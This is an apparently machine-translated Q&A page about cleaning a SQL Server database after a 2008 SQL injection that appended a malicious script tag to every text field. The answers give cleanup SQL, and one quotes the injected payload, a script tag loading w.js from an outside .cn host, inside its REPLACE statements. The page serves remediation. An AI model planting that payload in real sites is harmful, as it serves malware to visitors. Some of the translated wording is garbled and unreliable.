Best IT Recipes

What is the best way to clean up after SQL injection?

I was assigned the maintenance of a non-profit website that recently fell victim to an SQL injection attack. Someone used a form on the site to add text to every available text field in the database (varchar, nvarchar, etc.), which when rendering as HTML includes and executes a JavaScript file.

A search on the Google URL shows that it is from Romanian or Chinese mail spammers, but thatโ€™s not what matters right now.

I looked through and manually deleted the information from the text fields that appear on most of the visible and popular pages on the site, but I'm curious what would be the best programmatic way to remove text from other text fields on the site.

Obviously, there is still something to be done (to simplify the site against SQL injection, using something like markdowns instead of storing HTML, etc.), and I am working on them, but for now I really need this is a good way to log in and remove entered text. I know what exact text is, it is the same every time and is always added to the end of any text field. I canโ€™t let anyone delete all the HTML in the database at any time, and I donโ€™t know when it happened that way, I canโ€™t just go back to the backup. In addition, the site is hosted on a shared host, and I cannot connect directly to the database using SQL Server tools. I can execute queries against it, so if there is any way to create a SQL update statement to "find all text fields in all tables in the entire database and do this to clear them," this will be the Best.

+8
security sql database sql-server
Aug 28 '08 at 14:29
source share
4 answers

Recover data from a recent backup.

+5
Aug 28 '08 at 14:31
source share

I was a victim and you can use it to clean

UPDATE Table SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1) WHERE (ID IN (SELECT ID FROM Table WHERE (CHARINDEX('</title', Textfield, 1) > 0)))
+2
Oct 08 2018-10-10
source share

Assuming you are the victim of the same attack as everyone else, the SQLMenace code is close. However, this attack uses several different script URLs, so you have to configure it to make sure that it matches the URL that you see in your database.

I also wrote about this , and my solution code included a more general cleanup.

The important point is that the very first thing you need to do is delete the site . Now you are actively using malware for your users, and this may lead to a legal correction later. Place a placeholder so that your users do not remain in the dark but do not save malware. You can then fix the site to make sure it is no longer vulnerable to injection. The easiest way to do this for this particular attack is to simply disable the sysobjects / syscolumns permissions for your web user, but you will also want to do a cleaner cleanup, or it's just a matter of time until you break again. Then you can use the code to clean the site and return it in real time.

+1
Aug 28 '08 at 14:44
source share

This will change this value, it would also be wise to accept sysobject permissions on behalf of the user on which your site is running, and to reorganize course input

 DECLARE @T VARCHAR(255),@C VARCHAR(4000) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('if exists (select 1 from ['+@T+'] where ['+@C+'] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'') begin print ''update ['+@T+'] set ['+@C+']=replace(['+@C+'],''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''','''''''') where ['+@C+'] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'''''' end') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I wrote about this a while ago: Microsoft released tools for attacking SQL injections

0
Aug 28 '08 at 14:33
source share


More articles:


All Articles